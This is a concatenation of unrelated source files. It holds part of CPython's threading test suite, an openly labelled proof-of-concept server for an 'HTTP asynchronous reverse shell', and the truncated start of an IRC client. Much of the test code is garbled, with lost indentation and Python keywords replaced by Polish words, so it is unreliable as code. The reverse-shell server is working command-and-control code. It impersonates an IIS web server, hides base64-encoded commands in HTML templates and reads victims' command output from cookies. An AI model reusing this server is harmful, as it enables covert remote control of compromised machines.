        NUMTASKS = 10
        # no more than 3 of the 10 can run at once
        sema = threading.BoundedSemaphore(value=3)
        mutex = threading.RLock()
        numrunning = Counter()
        threads = []
        for i in range(NUMTASKS):
            t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
            threads.append(t)
            self.assertEqual(t.ident, None)
            self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
            t.start()
        if verbose:
            print('waiting for all tasks to complete')
        for t in threads:
            t.join()
            self.assertTrue(not t.is_alive())
            self.assertNotEqual(t.ident, 0)
            self.assertFalse(t.ident is None)
            self.assertTrue(re.match('<TestThread\(.*, stopped -?\d+\)>',
                                      repr(t)))
        if verbose:
            print('all tasks done')
        self.assertEqual(numrunning.get(), 0)
    def test_ident_of_no_threading_threads(self):
        # The ident still must work for the main thread and dummy threads.
        self.assertFalse(threading.currentThread().ident is None)
        def f():
            ident.append(threading.currentThread().ident)
            done.set()
        done = threading.Event()
        ident = []
        _thread.start_new_thread(f, ())
        done.wait()
        self.assertFalse(ident[0] is None)
        # Kill the "immortal" _DummyThread
        del threading._active[ident[0]]
    # run with a small(ish) thread stack size (256kB)
    def test_various_ops_small_stack(self):
        if verbose:
            print('with 256kB thread stack size...')
        try:
            threading.stack_size(262144)
        except _thread.error:
            raise unittest.SkipTest(
                'platform does not support changing thread stack size')
        self.test_various_ops()
        threading.stack_size(0)
    # run with a large thread stack size (1MB)
    def test_various_ops_large_stack(self):
        if verbose:
            print('with 1MB thread stack size...')
        try:
            threading.stack_size(0x100000)
        except _thread.error:
            raise unittest.SkipTest(
                'platform does not support changing thread stack size')
        self.test_various_ops()
        threading.stack_size(0)
    def test_foreign_thread(self):
        # Check that a "foreign" thread can use the threading module.
        def f(mutex):
            # Calling current_thread() forces an entry for the foreign
            # thread to get made in the threading._active map.
            threading.current_thread()
            mutex.release()
        mutex = threading.Lock()
        mutex.acquire()
        tid = _thread.start_new_thread(f, (mutex,))
        # Wait for the thread to finish.
        mutex.acquire()
        self.assertIn(tid, threading._active)
        self.assertIsInstance(threading._active[tid], threading._DummyThread)
        del threading._active[tid]
    # PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
    # exposed at the Python level. This test relies on ctypes to get at it.
    def test_PyThreadState_SetAsyncExc(self):
        ctypes = import_module("ctypes")
        set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
        class AsyncExc(Exception):
            pass
        exception = ctypes.py_object(AsyncExc)
        # First check it works when setting the exception from the same thread.
        tid = threading.get_ident()
        try:
            result = set_async_exc(ctypes.c_long(tid), exception)
            # The exception is async, so we might have to keep the VM busy until
            # it notices.
            while True:
                pass
        except AsyncExc:
            pass
        else:
            # This code is unreachable but it reflects the intent. If we wanted
            # to be smarter the above loop wouldn't be infinite.
            self.fail("AsyncExc not raised")
        try:
            self.assertEqual(result, 1) # one thread state modified
        except UnboundLocalError:
            # The exception was raised too quickly for us to get the result.
            pass
        # `worker_started` is set by the thread when it's inside a try/except
        # block waiting to catch the asynchronously set AsyncExc exception.
        # `worker_saw_exception` is set by the thread upon catching that
        # exception.
        worker_started = threading.Event()
        worker_saw_exception = threading.Event()
        class Worker(threading.Thread):
            def run(self):
                self.id = threading.get_ident()
                self.finished = False
                try:
                    while True:
                        worker_started.set()
                        time.sleep(0.1)
                except AsyncExc:
                    self.finished = True
                    worker_saw_exception.set()
        t = Worker()
        t.daemon = True # so if this fails, we don't hang Python at shutdown
        t.start()
        if verbose:
            print(" started worker thread")
        # Try a thread id that doesn't make sense.
        if verbose:
            print(" trying nonsensical thread id")
        result = set_async_exc(ctypes.c_long(-1), exception)
        self.assertEqual(result, 0) # no thread states modified
        # Now raise an exception in the worker thread.
        if verbose:
            print(" waiting for worker thread to get started")
        ret = worker_started.wait()
        self.assertTrue(ret)
        if verbose:
            print(" verifying worker hasn't exited")
        self.assertTrue(not t.finished)
        if verbose:
            print(" attempting to raise asynch exception in worker")
        result = set_async_exc(ctypes.c_long(t.id), exception)
        self.assertEqual(result, 1) # one thread state modified
        if verbose:
            print(" waiting for worker to say it caught the exception")
        worker_saw_exception.wait(timeout=10)
        self.assertTrue(t.finished)
        if verbose:
            print(" all OK -- joining worker")
        if t.finished:
            t.join()
        # else the thread is still running, and we have no way to kill it
    def test_limbo_cleanup(self):
        # Issue 7481: Failure to start thread should cleanup the limbo map.
        def fail_new_thread(*args):
            raise threading.ThreadError()
        _start_new_thread = threading._start_new_thread
        threading._start_new_thread = fail_new_thread
        try:
            t = threading.Thread(target=lambda: None)
            self.assertRaises(threading.ThreadError, t.start)
            self.assertFalse(
                t in threading._limbo,
                "Failed to cleanup _limbo map on failure of Thread.start().")
        finally:
            threading._start_new_thread = _start_new_thread
    def test_finalize_runnning_thread(self):
        # Issue 1402: the PyGILState_Ensure / _Release functions may be called
        # very late on python exit: on deallocation of a running thread for
        # example.
        import_module("ctypes")
        rc, out, err = assert_python_failure("-c", """if 1:
            import ctypes, sys, time, _thread
            # This lock is used as a simple event variable.
            ready = _thread.allocate_lock()
            ready.acquire()
            # Module globals are cleared before __del__ is run
            # So we save the functions in class dict
            class C:
                ensure = ctypes.pythonapi.PyGILState_Ensure
                release = ctypes.pythonapi.PyGILState_Release
                def __del__(self):
                    state = self.ensure()
                    self.release(state)
            def waitingThread():
                x = C()
                ready.release()
                time.sleep(100)
            _thread.start_new_thread(waitingThread, ())
            ready.acquire() # Be sure the other thread is waiting.
            sys.exit(42)
            """)
        self.assertEqual(rc, 42)
    def test_finalize_with_trace(self):
        # Issue1733757
        # Avoid a deadlock when sys.settrace steps into threading._shutdown
        assert_python_ok("-c", """if 1:
            import sys, threading
            # A deadlock-killer, to prevent the
            # testsuite to hang forever
            def killer():
                import os, time
                time.sleep(2)
                print('program blocked; aborting')
                os._exit(2)
            t = threading.Thread(target=killer)
            t.daemon = True
            t.start()
            # This is the trace function
            def func(frame, event, arg):
                threading.current_thread()
                return func
            sys.settrace(func)
            """)
    def test_join_nondaemon_on_shutdown(self):
        # Issue 1722344
        # Raising SystemExit skipped threading._shutdown
        rc, out, err = assert_python_ok("-c", """if 1:
            import threading
            from time import sleep
            def child():
                sleep(1)
                # As a non-daemon thread we SHOULD wake up and nothing
                # should be torn down yet
                print("Woke up, sleep function is:", sleep)
            threading.Thread(target=child).start()
            raise SystemExit
            """)
        self.assertEqual(out.strip(),
            b"Woke up, sleep function is: <built-in function sleep>")
        self.assertEqual(err, b"")
    def test_enumerate_after_join(self):
        # Try hard to trigger #1703448: a thread is still returned in
        # threading.enumerate() after it has been join()ed.
        enum = threading.enumerate
        old_interval = sys.getswitchinterval()
        try:
            for i in range(1, 100):
                sys.setswitchinterval(i * 0.0002)
                t = threading.Thread(target=lambda: None)
                t.start()
                t.join()
                l = enum()
                self.assertNotIn(t, l,
                    "#1703448 triggered after %d trials: %s" % (i, l))
        finally:
            sys.setswitchinterval(old_interval)
    def test_no_refcycle_through_target(self):
        class RunSelfFunction(object):
            def __init__(self, should_raise):
                # The links in this refcycle from Thread back to self
                # should be cleaned up when the thread completes.
                self.should_raise = should_raise
                self.thread = threading.Thread(target=self._run,
                                               args=(self,),
                                               kwargs={'yet_another':self})
                self.thread.start()
            def _run(self, other_ref, yet_another):
                if self.should_raise:
                    raise SystemExit
        cyclic_object = RunSelfFunction(should_raise=False)
        weak_cyclic_object = weakref.ref(cyclic_object)
        cyclic_object.thread.join()
        del cyclic_object
        self.assertIsNone(weak_cyclic_object(),
                          msg=('%d references still around' %
                               sys.getrefcount(weak_cyclic_object())))
        raising_cyclic_object = RunSelfFunction(should_raise=True)
        weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
        raising_cyclic_object.thread.join()
        del raising_cyclic_object
        self.assertIsNone(weak_raising_cyclic_object(),
                          msg=('%d references still around' %
                               sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(Prawda)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNieprawda('daemon' w repr(t))
t.daemon = Prawda
self.assertPrawda('daemon' w repr(t))
def test_deamon_param(self):
t = threading.Thread()
self.assertNieprawda(t.daemon)
t = threading.Thread(daemon=Nieprawda)
self.assertNieprawda(t.daemon)
t = threading.Thread(daemon=Prawda)
self.assertPrawda(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread w the active list doesn't mess up
# the after-fork mechanism.
code = """jeżeli 1:
zaimportuj _thread, threading, os, time
def background_thread(evt):
# Creates oraz registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
jeżeli os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
inaczej:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be Prawda on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
sys.setswitchinterval(1e-6)
dla i w range(20):
t = threading.Thread(target=lambda: Nic)
t.start()
self.addCleanup(t.join)
pid = os.fork()
jeżeli pid == 0:
os._exit(1 jeżeli t.is_alive() inaczej 0)
inaczej:
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """jeżeli 1:
zaimportuj os, threading
pid = os.fork()
jeżeli pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
inaczej:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nPrawda\nPrawda\n")
@unittest.skipIf(sys.platform w platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """jeżeli 1:
zaimportuj os, threading, sys
def f():
pid = os.fork()
jeżeli pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout jest fully buffered because nie a tty,
# we have to flush before exit.
sys.stdout.flush()
inaczej:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nPrawda\nPrawda\n")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock jest Nic until the thread jest started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, Nic)
t.start()
started.acquire()
self.assertPrawda(t.is_alive())
# The tstate lock can't be acquired when the thread jest running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertNieprawda(tstate_lock.acquire(timeout=0), Nieprawda)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertPrawda(tstate_lock.acquire(timeout=5), Nieprawda)
# But is_alive() jest still Prawda: we hold _tstate_lock now, which
# prevents is_alive() z knowing the thread's end-of-life C code
# jest done.
self.assertPrawda(t.is_alive())
# Let is_alive() find out the C code jest done.
tstate_lock.release()
self.assertNieprawda(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertPrawda(t._tstate_lock jest Nic)
def test_repr_stopped(self):
# Verify that "stopped" shows up w repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear w the repr w a reasonable amount of time.
# Implementation detail: jako of this writing, that's trivially true
# jeżeli .join() jest called, oraz almost trivially true jeżeli .is_alive() jest
# called. The detail we're testing here jest that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
dla i w range(500):
jeżeli LOOKING_FOR w repr(t):
przerwij
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should podnieś ValueError jeżeli released too often.
dla limit w range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
dla _ w range(limit)]
dla t w threads:
t.start()
dla t w threads:
t.join()
threads = [threading.Thread(target=bs.release)
dla _ w range(limit)]
dla t w threads:
t.start()
dla t w threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator jest created w a C thread that jest
# destroyed dopóki the generator jest still used. The issue was that a
# generator contains a frame, oraz the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function jest setup.
def noop_trace(frame, event, arg):
# no operation
zwróć noop_trace
def generator():
dopóki 1:
uzyskaj "generator"
def callback():
jeżeli callback.gen jest Nic:
callback.gen = generator()
zwróć next(callback.gen)
callback.gen = Nic
old_trace = sys.gettrace()
sys.settrace(noop_trace)
spróbuj:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator w a C thread which exits after the call
zaimportuj _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator w a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
dla test w range(3):
# The trace function jest still called here
callback()
w_końcu:
sys.settrace(old_trace)
klasa ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """jeżeli 1:
zaimportuj sys, os, time, threading
# a thread, which waits dla the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout jest fully buffered because nie a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait dla a non-daemon thread
script = """jeżeli 1:
zaimportuj os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform w platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but z a forked interpreter
script = """jeżeli 1:
childpid = os.fork()
jeżeli childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform w platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called z a worker thread
# In the forked process, the main Thread object must be marked jako stopped.
script = """jeżeli 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
jeżeli childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should nie block: main_thread jest already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform w platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of w
# the main thread.
script = """jeżeli Prawda:
zaimportuj os
zaimportuj random
zaimportuj sys
zaimportuj time
zaimportuj threading
thread_has_run = set()
def random_io():
'''Loop dla a dopóki sleeping random tiny amounts oraz doing some I/O.'''
dopóki Prawda:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
dla _ w range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = Prawda
new_thread.start()
count += 1
dopóki len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertNieprawda(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform w platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock w a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process oraz wait it
pid = os.fork()
jeżeli pid > 0:
os.waitpid(pid, 0)
inaczej:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
dla i w range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
dla t w threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
dla i w range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
jeżeli pid == 0:
# check that threads states have been cleared
jeżeli len(sys._current_frames()) == 1:
os._exit(0)
inaczej:
os._exit(1)
inaczej:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
dla t w threads:
t.join()
klasa SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""jeżeli 1:
zaimportuj os
zaimportuj threading
zaimportuj time
def f():
# Sleep a bit so that the thread jest still running when
# Py_EndInterpreter jest called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same jako above, but a delay gets introduced after the thread's
# Python code returned but before the thread state jest deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""jeżeli 1:
zaimportuj os
zaimportuj threading
zaimportuj time
klasa Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread jest still running when
# Py_EndInterpreter jest called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""jeżeli 1:
zaimportuj os
zaimportuj threading
zaimportuj time
def f():
# Make sure the daemon thread jest still running when
# Py_EndInterpreter jest called.
time.sleep(10)
threading.Thread(target=f, daemon=Prawda).start()
"""
script = r"""jeżeli 1:
zaimportuj _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
przy test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
klasa ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be podnieśd jeżeli Thread.start() jest called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", Prawda)
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' oraz test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X albo FreeBSD which have small default stack sizes
# dla threads
script = """jeżeli Prawda:
zaimportuj threading
def recurse():
zwróć recurse()
def outer():
spróbuj:
recurse()
wyjąwszy RecursionError:
dalej
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""jeżeli Prawda:
zaimportuj threading
zaimportuj time
running = Nieprawda
def run():
global running
running = Prawda
dopóki running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
dopóki nie running:
time.sleep(0.01)
running = Nieprawda
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception w thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""jeżeli Prawda:
zaimportuj sys
zaimportuj threading
zaimportuj time
running = Nieprawda
def run():
global running
running = Prawda
dopóki running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
dopóki nie running:
time.sleep(0.01)
sys.stderr = Nic
running = Nieprawda
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception w thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""jeżeli Prawda:
zaimportuj sys
zaimportuj threading
zaimportuj time
running = Nieprawda
def run():
global running
running = Prawda
dopóki running:
time.sleep(0.01)
1/0
sys.stderr = Nic
t = threading.Thread(target=run)
t.start()
dopóki nie running:
time.sleep(0.01)
running = Nieprawda
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
klasa TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes oraz affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
klasa LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
klasa PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock jest Nic, 'RLock nie implemented w C')
klasa CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
klasa EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
klasa ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default oraz exports its API.
locktype = staticmethod(threading.Condition)
klasa ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
klasa SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
klasa BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
klasa BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
jeżeli __name__ == "__main__":
unittest.main()
|
HARS_Server.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# HTTP ASYNCHRONE REVERSE SHELL
# Version : 0.1 POC
# Git : https://github.com/onSec-fr
import BaseHTTPServer, SimpleHTTPServer
import ssl
import os
import base64
import threading
import sys
import random
# Config
PORT = 443
CERT_FILE = '../server.pem'
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
# Custom headers
def _set_headers(self):
self.send_header("Cache-Control", "private, max-age=0")
self.send_header("Content-Type", "text/html; charset=utf-8")
self.send_header("Vary", "Accept-Encoding")
self.send_header("Connection", "close")
self.end_headers()
# GET events
def do_GET(self):
if self.path.startswith("/search"):
if initConn == False:
# If client say hello, then reply hello (first connection)
if base64.b64decode(self.headers['Cookie']) == "HELLO":
print(Colors.GREEN + '[!] Connection established with ' + self.client_address[0] + "\n" + Colors.END)
InitConn()
self.send_response(200)
self._set_headers()
cmd = 'HELLO'
encodedCmd = str(base64.b64encode(cmd.encode("utf-8")))
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
outfile = file.read() + encodedCmd
self.wfile.write(outfile)
else:
self.send_response(404)
self._set_headers()
self.wfile.write("Not found")
# Client ask for instructions
elif base64.b64decode(self.headers['Cookie']) == "ASK":
with open('search', 'r') as file:
outfile = file.read()
self.send_response(200)
self._set_headers()
self.wfile.write(outfile)
if (wait == False):
InitFile()
# Client reply with output
else:
resp = base64.b64decode(self.headers['Cookie'])
if resp == "EXIT OK":
stop_server()
else:
print(Colors.LIGHT_WHITE + "\n" + resp + Colors.END)
InitFile()
self.send_response(200)
self._set_headers()
with open('search', 'r') as file:
outfile = file.read()
self.wfile.write(outfile)
CancelWait()
else:
self.send_response(404)
self._set_headers()
self.wfile.write("Not found")
# Save logs
log_file = open('../logs/logs.txt', 'w')
def log_message(self, format, *args):
self.log_file.write("%s - - [%s] %s\n" %(self.client_address[0],self.log_date_time_string(),format%args))
def InitConn():
global initConn
initConn = True
def CancelWait():
global wait
wait = False
# Choose random template file
def InitFile():
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
template = file.read()
outfile = open("search", "w")
outfile.write(template)
outfile.close()
class Colors:
BLACK = "\033[0;30m"
RED = "\033[0;31m"
GREEN = "\033[0;32m"
BROWN = "\033[0;33m"
BLUE = "\033[0;34m"
PURPLE = "\033[0;35m"
CYAN = "\033[0;36m"
LIGHT_GRAY = "\033[0;37m"
DARK_GRAY = "\033[1;30m"
LIGHT_RED = "\033[1;31m"
LIGHT_GREEN = "\033[1;32m"
YELLOW = "\033[1;33m"
LIGHT_BLUE = "\033[1;34m"
LIGHT_PURPLE = "\033[1;35m"
LIGHT_CYAN = "\033[1;36m"
LIGHT_WHITE = "\033[1;37m"
BOLD = "\033[1m"
FAINT = "\033[2m"
ITALIC = "\033[3m"
UNDERLINE = "\033[4m"
BLINK = "\033[5m"
NEGATIVE = "\033[7m"
CROSSED = "\033[9m"
END = "\033[0m"
if not __import__("sys").stdout.isatty():
for _ in dir():
if isinstance(_, str) and _[0] != "_":
locals()[_] = ""
else:
if __import__("platform").system() == "Windows":
kernel32 = __import__("ctypes").windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)
del kernel32
# Start http server
def start_server():
global httpd
print(Colors.BLUE + '[!] Server listening on port ' + str(PORT) + ', waiting connection from client...' + Colors.END)
server_class = BaseHTTPServer.HTTPServer
MyHandler.server_version = "Microsoft-IIS/8.5"
MyHandler.sys_version = ""
httpd = server_class(('0.0.0.0', PORT), MyHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile=CERT_FILE, server_side=True)
httpd.serve_forever()
# Exit
def stop_server():
print(Colors.YELLOW + '[!] Exit' + Colors.END)
os.remove("search")
os._exit(1)
if __name__ == '__main__':
# Init
initConn = False
wait = True
InitFile()
try:
# Start http server in separate thread
daemon = threading.Thread(target=start_server)
daemon.daemon = True
daemon.start()
# Wait for first connection from client
while (initConn == False):
pass
while True:
cmd = raw_input("Command> ")
wait = True
print(Colors.BLUE + 'Awaiting response ...' + Colors.END)
encodedCmd = str(base64.b64encode(cmd.encode("utf-8")))
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
template = file.read() + encodedCmd
outfile = open("search", "w")
outfile.write(template)
outfile.close()
# Wait for client's reply
while (wait == True):
pass
except KeyboardInterrupt:
stop_server()
|
client.py
|
#! /usr/bin/env python3
import json
import re
import socket
import sys
import threading
import time
import tkinter as tk
from datetime import datetime
IRCRE = ('^(?::(\S+?)(?:!(\S+?))?(?:@(\S+?))? )?' # Nick!User@Host
+ '(\S+)(?: (?!:)(.+?))?(?: :(.+))?$') # CMD Params Params :Message
class IRC(object):
def connect(self, server, port, nick, user=None, name=None):
self.nick = nick
